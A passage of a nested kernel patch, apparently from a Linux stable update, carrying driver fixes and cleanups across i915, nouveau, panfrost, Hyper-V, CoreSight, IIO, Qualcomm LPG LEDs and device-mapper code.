+ 	struct intel_connector *connector =
+ 		to_intel_connector(old_conn_state->connector);
+-	struct drm_dp_mst_topology_state *mst_state =
+-		drm_atomic_get_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *old_mst_state =
++		drm_atomic_get_old_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *new_mst_state =
++		drm_atomic_get_new_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	const struct drm_dp_mst_atomic_payload *old_payload =
++		drm_atomic_get_mst_payload_state(old_mst_state, connector->port);
++	struct drm_dp_mst_atomic_payload *new_payload =
++		drm_atomic_get_mst_payload_state(new_mst_state, connector->port);
+ 	struct drm_i915_private *i915 = to_i915(connector->base.dev);
+ 
+ 	drm_dbg_kms(&i915->drm, "active links %d\n",
+@@ -373,8 +379,8 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 
+ 	intel_hdcp_disable(intel_mst->connector);
+ 
+-	drm_dp_remove_payload(&intel_dp->mst_mgr, mst_state,
+-			      drm_atomic_get_mst_payload_state(mst_state, connector->port));
++	drm_dp_remove_payload(&intel_dp->mst_mgr, new_mst_state,
++			      old_payload, new_payload);
+ 
+ 	intel_audio_codec_disable(encoder, old_crtc_state, old_conn_state);
+ }
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index bfd1ffc71a489..fc4a846289855 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2017,6 +2017,8 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 	 * inspecting the queue to see if we need to resumbit.
+ 	 */
+ 	if (*prev != *execlists->active) { /* elide lite-restores */
++		struct intel_context *prev_ce = NULL, *active_ce = NULL;
++
+ 		/*
+ 		 * Note the inherent discrepancy between the HW runtime,
+ 		 * recorded as part of the context switch, and the CPU
+@@ -2028,9 +2030,15 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 		 * and correct overselves later when updating from HW.
+ 		 */
+ 		if (*prev)
+-			lrc_runtime_stop((*prev)->context);
++			prev_ce = (*prev)->context;
+ 		if (*execlists->active)
+-			lrc_runtime_start((*execlists->active)->context);
++			active_ce = (*execlists->active)->context;
++		if (prev_ce != active_ce) {
++			if (prev_ce)
++				lrc_runtime_stop(prev_ce);
++			if (active_ce)
++				lrc_runtime_start(active_ce);
++		}
+ 		new_timeslice(execlists);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 0defbb43ceea8..3ce49c118b83f 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -4270,13 +4270,13 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 		err = oa_config->id;
+ 		goto sysfs_err;
+ 	}
+-
+-	mutex_unlock(&perf->metrics_lock);
++	id = oa_config->id;
+ 
+ 	drm_dbg(&perf->i915->drm,
+ 		"Added config %s id=%i\n", oa_config->uuid, oa_config->id);
++	mutex_unlock(&perf->metrics_lock);
+ 
+-	return oa_config->id;
++	return id;
+ 
+ sysfs_err:
+ 	mutex_unlock(&perf->metrics_lock);
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 64eacd11b8bff..2372bfa04aa87 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -3747,9 +3747,10 @@
+ 
+ /* Skylake+ pipe bottom (background) color */
+ #define _SKL_BOTTOM_COLOR_A		0x70034
++#define _SKL_BOTTOM_COLOR_B		0x71034
+ #define   SKL_BOTTOM_COLOR_GAMMA_ENABLE		REG_BIT(31)
+ #define   SKL_BOTTOM_COLOR_CSC_ENABLE		REG_BIT(30)
+-#define SKL_BOTTOM_COLOR(pipe)		_MMIO_PIPE2(pipe, _SKL_BOTTOM_COLOR_A)
++#define SKL_BOTTOM_COLOR(pipe)		_MMIO_PIPE(pipe, _SKL_BOTTOM_COLOR_A, _SKL_BOTTOM_COLOR_B)
+ 
+ #define _ICL_PIPE_A_STATUS			0x70058
+ #define ICL_PIPESTATUS(pipe)			_MMIO_PIPE2(pipe, _ICL_PIPE_A_STATUS)
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index 33c97d510999b..006cb76adaa93 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -410,6 +410,35 @@ nv50_outp_atomic_check_view(struct drm_encoder *encoder,
+ 	return 0;
+ }
+ 
++static void
++nv50_outp_atomic_fix_depth(struct drm_encoder *encoder, struct drm_crtc_state *crtc_state)
++{
++	struct nv50_head_atom *asyh = nv50_head_atom(crtc_state);
++	struct nouveau_encoder *nv_encoder = nouveau_encoder(encoder);
++	struct drm_display_mode *mode = &asyh->state.adjusted_mode;
++	unsigned int max_rate, mode_rate;
++
++	switch (nv_encoder->dcb->type) {
++	case DCB_OUTPUT_DP:
++		max_rate = nv_encoder->dp.link_nr * nv_encoder->dp.link_bw;
++
++		/* we don't support more than 10 anyway */
++		asyh->or.bpc = min_t(u8, asyh->or.bpc, 10);
++
++		/* reduce the bpc until it works out */
++		while (asyh->or.bpc > 6) {
++			mode_rate = DIV_ROUND_UP(mode->clock * asyh->or.bpc * 3, 8);
++			if (mode_rate <= max_rate)
++				break;
++
++			asyh->or.bpc -= 2;
++		}
++		break;
++	default:
++		break;
++	}
++}
++
+ static int
+ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 		       struct drm_crtc_state *crtc_state,
+@@ -428,6 +457,9 @@ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 	if (crtc_state->mode_changed || crtc_state->connectors_changed)
+ 		asyh->or.bpc = connector->display_info.bpc;
+ 
++	/* We might have to reduce the bpc */
++	nv50_outp_atomic_fix_depth(encoder, crtc_state);
++
+ 	return 0;
+ }
+ 
+@@ -996,7 +1028,7 @@ nv50_msto_prepare(struct drm_atomic_state *state,
+ 
+ 	// TODO: Figure out if we want to do a better job of handling VCPI allocation failures here?
+ 	if (msto->disabled) {
+-		drm_dp_remove_payload(mgr, mst_state, payload);
++		drm_dp_remove_payload(mgr, mst_state, payload, payload);
+ 	} else {
+ 		if (msto->enabled)
+ 			drm_dp_add_payload_part1(mgr, mst_state, payload);
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index 20db8ea1a0baf..53185746fb3d1 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -245,8 +245,6 @@ void nouveau_dp_irq(struct nouveau_drm *drm,
+ }
+ 
+ /* TODO:
+- * - Use the minimum possible BPC here, once we add support for the max bpc
+- *   property.
+  * - Validate against the DP caps advertised by the GPU (we don't check these
+  *   yet)
+  */
+@@ -258,7 +256,11 @@ nv50_dp_mode_valid(struct drm_connector *connector,
+ {
+ 	const unsigned int min_clock = 25000;
+ 	unsigned int max_rate, mode_rate, ds_max_dotclock, clock = mode->clock;
+-	const u8 bpp = connector->display_info.bpc * 3;
++	/* Check with the minmum bpc always, so we can advertise better modes.
++	 * In particlar not doing this causes modes to be dropped on HDR
++	 * displays as we might check with a bpc of 16 even.
++	 */
++	const u8 bpp = 6 * 3;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_INTERLACE && !outp->caps.dp_interlace)
+ 		return MODE_NO_INTERLACE;
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 666a5e53fe193..e961fa27702ce 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -504,6 +504,7 @@ static int panfrost_mmu_map_fault_addr(struct panfrost_device *pfdev, int as,
+ 		if (IS_ERR(pages[i])) {
+ 			mutex_unlock(&bo->base.pages_lock);
+ 			ret = PTR_ERR(pages[i]);
++			pages[i] = NULL;
+ 			goto err_pages;
+ 		}
+ 	}
+diff --git a/drivers/hv/connection.c b/drivers/hv/connection.c
+index 9dc27e5d367a2..da51b50787dff 100644
+--- a/drivers/hv/connection.c
++++ b/drivers/hv/connection.c
+@@ -409,6 +409,10 @@ void vmbus_disconnect(void)
+  */
+ struct vmbus_channel *relid2channel(u32 relid)
+ {
++	if (vmbus_connection.channels == NULL) {
++		pr_warn_once("relid2channel: relid=%d: No channels mapped!\n", relid);
++		return NULL;
++	}
+ 	if (WARN_ON(relid >= MAX_CHANNEL_RELIDS))
+ 		return NULL;
+ 	return READ_ONCE(vmbus_connection.channels[relid]);
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index c7a65d1524fcb..1cf7478da6ee8 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -451,7 +451,7 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		if (etm4x_sspcicrn_present(drvdata, i))
+ 			etm4x_relaxed_write32(csa, config->ss_pe_cmp[i], TRCSSPCICRn(i));
+ 	}
+-	for (i = 0; i < drvdata->nr_addr_cmp; i++) {
++	for (i = 0; i < drvdata->nr_addr_cmp * 2; i++) {
+ 		etm4x_relaxed_write64(csa, config->addr_val[i], TRCACVRn(i));
+ 		etm4x_relaxed_write64(csa, config->addr_acc[i], TRCACATRn(i));
+ 	}
+@@ -1010,25 +1010,21 @@ static bool etm4_init_iomem_access(struct etmv4_drvdata *drvdata,
+ 				   struct csdev_access *csa)
+ {
+ 	u32 devarch = readl_relaxed(drvdata->base + TRCDEVARCH);
+-	u32 idr1 = readl_relaxed(drvdata->base + TRCIDR1);
+ 
+ 	/*
+ 	 * All ETMs must implement TRCDEVARCH to indicate that
+-	 * the component is an ETMv4. To support any broken
+-	 * implementations we fall back to TRCIDR1 check, which
+-	 * is not really reliable.
++	 * the component is an ETMv4. Even though TRCIDR1 also
++	 * contains the information, it is part of the "Trace"
++	 * register and must be accessed with the OSLK cleared,
++	 * with MMIO. But we cannot touch the OSLK until we are
++	 * sure this is an ETM. So rely only on the TRCDEVARCH.
+ 	 */
+-	if ((devarch & ETM_DEVARCH_ID_MASK) == ETM_DEVARCH_ETMv4x_ARCH) {
+-		drvdata->arch = etm_devarch_to_arch(devarch);
+-	} else {
+-		pr_warn("CPU%d: ETM4x incompatible TRCDEVARCH: %x, falling back to TRCIDR1\n",
+-			smp_processor_id(), devarch);
+-
+-		if (ETM_TRCIDR1_ARCH_MAJOR(idr1) != ETM_TRCIDR1_ARCH_ETMv4)
+-			return false;
+-		drvdata->arch = etm_trcidr_to_arch(idr1);
++	if ((devarch & ETM_DEVARCH_ID_MASK) != ETM_DEVARCH_ETMv4x_ARCH) {
++		pr_warn_once("TRCDEVARCH doesn't match ETMv4 architecture\n");
++		return false;
+ 	}
+ 
++	drvdata->arch = etm_devarch_to_arch(devarch);
+ 	*csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+ 	return true;
+ }
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 4b21bb79f1682..0174fbf1a9637 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -753,14 +753,12 @@
+  * TRCDEVARCH	- CoreSight architected register
+  *                - Bits[15:12] - Major version
+  *                - Bits[19:16] - Minor version
+- * TRCIDR1	- ETM architected register
+- *                - Bits[11:8] - Major version
+- *                - Bits[7:4]  - Minor version
+- * We must rely on TRCDEVARCH for the version information,
+- * however we don't want to break the support for potential
+- * old implementations which might not implement it. Thus
+- * we fall back to TRCIDR1 if TRCDEVARCH is not implemented
+- * for memory mapped components.
++ *
++ * We must rely only on TRCDEVARCH for the version information. Even though,
++ * TRCIDR1 also provides the architecture version, it is a "Trace" register
++ * and as such must be accessed only with Trace power domain ON. This may
++ * not be available at probe time.
++ *
+  * Now to make certain decisions easier based on the version
+  * we use an internal representation of the version in the
+  * driver, as follows :
+@@ -786,12 +784,6 @@ static inline u8 etm_devarch_to_arch(u32 devarch)
+ 				ETM_DEVARCH_REVISION(devarch));
+ }
+ 
+-static inline u8 etm_trcidr_to_arch(u32 trcidr1)
+-{
+-	return ETM_ARCH_VERSION(ETM_TRCIDR1_ARCH_MAJOR(trcidr1),
+-				ETM_TRCIDR1_ARCH_MINOR(trcidr1));
+-}
+-
+ enum etm_impdef_type {
+ 	ETM4_IMPDEF_HISI_CORE_COMMIT,
+ 	ETM4_IMPDEF_FEATURE_MAX,
+diff --git a/drivers/iio/adc/ad7791.c b/drivers/iio/adc/ad7791.c
+index fee8d129a5f08..86effe8501b44 100644
+--- a/drivers/iio/adc/ad7791.c
++++ b/drivers/iio/adc/ad7791.c
+@@ -253,7 +253,7 @@ static const struct ad_sigma_delta_info ad7791_sigma_delta_info = {
+ 	.has_registers = true,
+ 	.addr_shift = 4,
+ 	.read_mask = BIT(3),
+-	.irq_flags = IRQF_TRIGGER_LOW,
++	.irq_flags = IRQF_TRIGGER_FALLING,
+ };
+ 
+ static int ad7791_read_raw(struct iio_dev *indio_dev,
+diff --git a/drivers/iio/adc/ltc2497.c b/drivers/iio/adc/ltc2497.c
+index 556f10dfb5023..e1e14f5d237d2 100644
+--- a/drivers/iio/adc/ltc2497.c
++++ b/drivers/iio/adc/ltc2497.c
+@@ -28,7 +28,6 @@ struct ltc2497_driverdata {
+ 	struct ltc2497core_driverdata common_ddata;
+ 	struct i2c_client *client;
+ 	u32 recv_size;
+-	u32 sub_lsb;
+ 	/*
+ 	 * DMA (thus cache coherency maintenance) may require the
+ 	 * transfer buffers to live in their own cache lines.
+@@ -65,10 +64,10 @@ static int ltc2497_result_and_measure(struct ltc2497core_driverdata *ddata,
+ 		 * equivalent to a sign extension.
+ 		 */
+ 		if (st->recv_size == 3) {
+-			*val = (get_unaligned_be24(st->data.d8) >> st->sub_lsb)
++			*val = (get_unaligned_be24(st->data.d8) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		} else {
+-			*val = (be32_to_cpu(st->data.d32) >> st->sub_lsb)
++			*val = (be32_to_cpu(st->data.d32) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		}
+ 
+@@ -122,7 +121,6 @@ static int ltc2497_probe(struct i2c_client *client,
+ 	st->common_ddata.chip_info = chip_info;
+ 
+ 	resolution = chip_info->resolution;
+-	st->sub_lsb = 31 - (resolution + 1);
+ 	st->recv_size = BITS_TO_BYTES(resolution) + 1;
+ 
+ 	return ltc2497core_probe(dev, indio_dev);
+diff --git a/drivers/iio/adc/qcom-spmi-adc5.c b/drivers/iio/adc/qcom-spmi-adc5.c
+index 821fee60a7651..d1b86570768a9 100644
+--- a/drivers/iio/adc/qcom-spmi-adc5.c
++++ b/drivers/iio/adc/qcom-spmi-adc5.c
+@@ -626,12 +626,20 @@ static int adc5_get_fw_channel_data(struct adc5_chip *adc,
+ 				    struct fwnode_handle *fwnode,
+ 				    const struct adc5_data *data)
+ {
+-	const char *name = fwnode_get_name(fwnode), *channel_name;
++	const char *channel_name;
++	char *name;
+ 	u32 chan, value, varr[2];
+ 	u32 sid = 0;
+ 	int ret;
+ 	struct device *dev = adc->dev;
+ 
++	name = devm_kasprintf(dev, GFP_KERNEL, "%pfwP", fwnode);
++	if (!name)
++		return -ENOMEM;
++
++	/* Cut the address part */
++	name[strchrnul(name, '@') - name] = '\0';
++
+ 	ret = fwnode_property_read_u32(fwnode, "reg", &chan);
+ 	if (ret) {
+ 		dev_err(dev, "invalid channel number %s\n", name);
+diff --git a/drivers/iio/adc/ti-ads7950.c b/drivers/iio/adc/ti-ads7950.c
+index 2cc9a9bd9db60..263fc3a1b87e1 100644
+--- a/drivers/iio/adc/ti-ads7950.c
++++ b/drivers/iio/adc/ti-ads7950.c
+@@ -634,6 +634,7 @@ static int ti_ads7950_probe(struct spi_device *spi)
+ 	st->chip.label = dev_name(&st->spi->dev);
+ 	st->chip.parent = &st->spi->dev;
+ 	st->chip.owner = THIS_MODULE;
++	st->chip.can_sleep = true;
+ 	st->chip.base = -1;
+ 	st->chip.ngpio = TI_ADS7950_NUM_GPIOS;
+ 	st->chip.get_direction = ti_ads7950_get_direction;
+diff --git a/drivers/iio/dac/cio-dac.c b/drivers/iio/dac/cio-dac.c
+index 791dd999cf291..18a64f72fc188 100644
+--- a/drivers/iio/dac/cio-dac.c
++++ b/drivers/iio/dac/cio-dac.c
+@@ -66,8 +66,8 @@ static int cio_dac_write_raw(struct iio_dev *indio_dev,
+ 	if (mask != IIO_CHAN_INFO_RAW)
+ 		return -EINVAL;
+ 
+-	/* DAC can only accept up to a 16-bit value */
+-	if ((unsigned int)val > 65535)
++	/* DAC can only accept up to a 12-bit value */
++	if ((unsigned int)val > 4095)
+ 		return -EINVAL;
+ 
+ 	priv->chan_out_states[chan->channel] = val;
+diff --git a/drivers/iio/imu/Kconfig b/drivers/iio/imu/Kconfig
+index f1d7d4b5e2224..c2f97629e9cdb 100644
+--- a/drivers/iio/imu/Kconfig
++++ b/drivers/iio/imu/Kconfig
+@@ -47,6 +47,7 @@ config ADIS16480
+ 	depends on SPI
+ 	select IIO_ADIS_LIB
+ 	select IIO_ADIS_LIB_BUFFER if IIO_BUFFER
++	select CRC32
+ 	help
+ 	  Say yes here to build support for Analog Devices ADIS16375, ADIS16480,
+ 	  ADIS16485, ADIS16488 inertial sensors.
+diff --git a/drivers/iio/industrialio-buffer.c b/drivers/iio/industrialio-buffer.c
+index 228598b82a2f3..7e7ee307a3f7d 100644
+--- a/drivers/iio/industrialio-buffer.c
++++ b/drivers/iio/industrialio-buffer.c
+@@ -203,24 +203,27 @@ static ssize_t iio_buffer_write(struct file *filp, const char __user *buf,
+ 				break;
+ 			}
+ 
++			if (filp->f_flags & O_NONBLOCK) {
++				if (!written)
++					ret = -EAGAIN;
++				break;
++			}
++
+ 			wait_woken(&wait, TASK_INTERRUPTIBLE,
+ 					MAX_SCHEDULE_TIMEOUT);
+ 			continue;
+ 		}
+ 
+ 		ret = rb->access->write(rb, n - written, buf + written);
+-		if (ret == 0 && (filp->f_flags & O_NONBLOCK))
+-			ret = -EAGAIN;
++		if (ret < 0)
++			break;
+ 
+-		if (ret > 0) {
+-			written += ret;
+-			if (written != n && !(filp->f_flags & O_NONBLOCK))
+-				continue;
+-		}
+-	} while (ret == 0);
++		written += ret;
++
++	} while (written != n);
+ 	remove_wait_queue(&rb->pollq, &wait);
+ 
+-	return ret < 0 ? ret : n;
++	return ret < 0 ? ret : written;
+ }
+ 
+ /**
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index b1674a5bfa368..d4a34a3bf00d9 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -429,6 +429,14 @@ static const struct iio_info cm32181_info = {
+ 	.attrs			= &cm32181_attribute_group,
+ };
+ 
++static void cm32181_unregister_dummy_client(void *data)
++{
++	struct i2c_client *client = data;
++
++	/* Unregister the dummy client */
++	i2c_unregister_device(client);
++}
++
+ static int cm32181_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+@@ -460,6 +468,10 @@ static int cm32181_probe(struct i2c_client *client)
+ 		client = i2c_acpi_new_device(dev, 1, &board_info);
+ 		if (IS_ERR(client))
+ 			return PTR_ERR(client);
++
++		ret = devm_add_action_or_reset(dev, cm32181_unregister_dummy_client, client);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	cm32181 = iio_priv(indio_dev);
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index c1a56259226fb..f1c2419334e6f 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -972,8 +972,8 @@ out_unlock:
+ 	return ret;
+ }
+ 
+-static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct lpg *lpg = container_of(chip, struct lpg, pwm);
+ 	struct lpg_channel *chan = &lpg->channels[pwm->hwpwm];
+@@ -986,20 +986,20 @@ static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(lpg->map, chan->base + LPG_SIZE_CLK_REG, &val);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	refclk = lpg_clk_rates[val & PWM_CLK_SELECT_MASK];
+ 	if (refclk) {
+ 		ret = regmap_read(lpg->map, chan->base + LPG_PREDIV_CLK_REG, &val);
+ 		if (ret)
+-			return;
++			return 0;
+ 
+ 		pre_div = lpg_pre_divs[FIELD_GET(PWM_FREQ_PRE_DIV_MASK, val)];
+ 		m = FIELD_GET(PWM_FREQ_EXP_MASK, val);
+ 
+ 		ret = regmap_bulk_read(lpg->map, chan->base + PWM_VALUE_REG, &pwm_value, sizeof(pwm_value));
+ 		if (ret)
+-			return;
++			return 0;
+ 
+ 		state->period = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC * LPG_RESOLUTION * pre_div * (1 << m), refclk);
+ 		state->duty_cycle = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC * pwm_value * pre_div * (1 << m), refclk);
+@@ -1010,13 +1010,15 @@ static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(lpg->map, chan->base + PWM_ENABLE_CONTROL_REG, &val);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	state->enabled = FIELD_GET(LPG_ENABLE_CONTROL_OUTPUT, val);
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	if (state->duty_cycle > state->period)
+ 		state->duty_cycle = state->period;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops lpg_pwm_ops = {
+diff --git a/drivers/md/dm-bio-prison-v1.c b/drivers/md/dm-bio-prison-v1.c
+index 1f8f98efd97a0..138067abe14b7 100644
+--- a/drivers/md/dm-bio-prison-v1.c
++++ b/drivers/md/dm-bio-prison-v1.c
+@@ -285,14 +285,14 @@ EXPORT_SYMBOL_GPL(dm_cell_promote_or_release);
+ 
+ struct dm_deferred_entry {
+ 	struct dm_deferred_set *ds;
+-	unsigned count;
++	unsigned int count;
+ 	struct list_head work_items;
+ };
+ 
+ struct dm_deferred_set {
+ 	spinlock_t lock;
+-	unsigned current_entry;
+-	unsigned sweeper;
++	unsigned int current_entry;
++	unsigned int sweeper;
+ 	struct dm_deferred_entry entries[DEFERRED_SET_SIZE];
+ };
+ 
+@@ -338,7 +338,7 @@ struct dm_deferred_entry *dm_deferred_entry_inc(struct dm_deferred_set *ds)
+ }
+ EXPORT_SYMBOL_GPL(dm_deferred_entry_inc);
+ 
+-static unsigned ds_next(unsigned index)
++static unsigned int ds_next(unsigned int index)
+ {
+ 	return (index + 1) % DEFERRED_SET_SIZE;
+ }
+@@ -373,7 +373,7 @@ EXPORT_SYMBOL_GPL(dm_deferred_entry_dec);
+ int dm_deferred_set_add_work(struct dm_deferred_set *ds, struct list_head *work)
+ {
+ 	int r = 1;
+-	unsigned next_entry;
++	unsigned int next_entry;
+ 
+ 	spin_lock_irq(&ds->lock);
+ 	if ((ds->sweeper == ds->current_entry) &&
+diff --git a/drivers/md/dm-bio-prison-v2.c b/drivers/md/dm-bio-prison-v2.c
+index 9dec3b61cf70a..0cc0d13c40e51 100644
+--- a/drivers/md/dm-bio-prison-v2.c
++++ b/drivers/md/dm-bio-prison-v2.c
+@@ -148,7 +148,7 @@ static bool __find_or_insert(struct dm_bio_prison_v2 *prison,
+ 
+ static bool __get(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct bio *inmate,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell)
+@@ -171,7 +171,7 @@ static bool __get(struct dm_bio_prison_v2 *prison,
+ 
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+@@ -224,7 +224,7 @@ EXPORT_SYMBOL_GPL(dm_cell_put_v2);
+ 
+ static int __lock(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -255,7 +255,7 @@ static int __lock(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -291,7 +291,7 @@ EXPORT_SYMBOL_GPL(dm_cell_quiesce_v2);
+ 
+ static int __promote(struct dm_bio_prison_v2 *prison,
+ 		     struct dm_bio_prison_cell_v2 *cell,
+-		     unsigned new_lock_level)
++		     unsigned int new_lock_level)
+ {
+ 	if (!cell->exclusive_lock)
+ 		return -EINVAL;
+@@ -302,7 +302,7 @@ static int __promote(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level)
++			    unsigned int new_lock_level)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-bio-prison-v2.h b/drivers/md/dm-bio-prison-v2.h
+index 6e04234268db3..5a7d996bbbd80 100644
+--- a/drivers/md/dm-bio-prison-v2.h
++++ b/drivers/md/dm-bio-prison-v2.h
+@@ -44,8 +44,8 @@ struct dm_cell_key_v2 {
+ struct dm_bio_prison_cell_v2 {
+ 	// FIXME: pack these
+ 	bool exclusive_lock;
+-	unsigned exclusive_level;
+-	unsigned shared_count;
++	unsigned int exclusive_level;
++	unsigned int shared_count;
+ 	struct work_struct *quiesce_continuation;
+ 
+ 	struct rb_node node;
+@@ -86,7 +86,7 @@ void dm_bio_prison_free_cell_v2(struct dm_bio_prison_v2 *prison,
+  */
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+@@ -114,7 +114,7 @@ bool dm_cell_put_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+ 
+@@ -132,7 +132,7 @@ void dm_cell_quiesce_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level);
++			    unsigned int new_lock_level);
+ 
+ /*
+  * Adds any held bios to the bio list.
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 19caaf684ee34..382c5cc471952 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -89,7 +89,7 @@ struct dm_bufio_client {
+ 	unsigned long n_buffers[LIST_SIZE];
+ 
+ 	struct block_device *bdev;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	s8 sectors_per_block_bits;
+ 	void (*alloc_callback)(struct dm_buffer *);
+ 	void (*write_callback)(struct dm_buffer *);
+@@ -98,9 +98,9 @@ struct dm_bufio_client {
+ 	struct dm_io_client *dm_io;
+ 
+ 	struct list_head reserved_buffers;
+-	unsigned need_reserved_buffers;
++	unsigned int need_reserved_buffers;
+ 
+-	unsigned minimum_buffers;
++	unsigned int minimum_buffers;
+ 
+ 	struct rb_root buffer_tree;
+ 	wait_queue_head_t free_buffer_wait;
+@@ -145,14 +145,14 @@ struct dm_buffer {
+ 	unsigned char list_mode;		/* LIST_* */
+ 	blk_status_t read_error;
+ 	blk_status_t write_error;
+-	unsigned accessed;
+-	unsigned hold_count;
++	unsigned int accessed;
++	unsigned int hold_count;
+ 	unsigned long state;
+ 	unsigned long last_accessed;
+-	unsigned dirty_start;
+-	unsigned dirty_end;
+-	unsigned write_start;
+-	unsigned write_end;
++	unsigned int dirty_start;
++	unsigned int dirty_end;
++	unsigned int write_start;
++	unsigned int write_end;
+ 	struct dm_bufio_client *c;
+ 	struct list_head write_list;
+ 	void (*end_io)(struct dm_buffer *, blk_status_t);
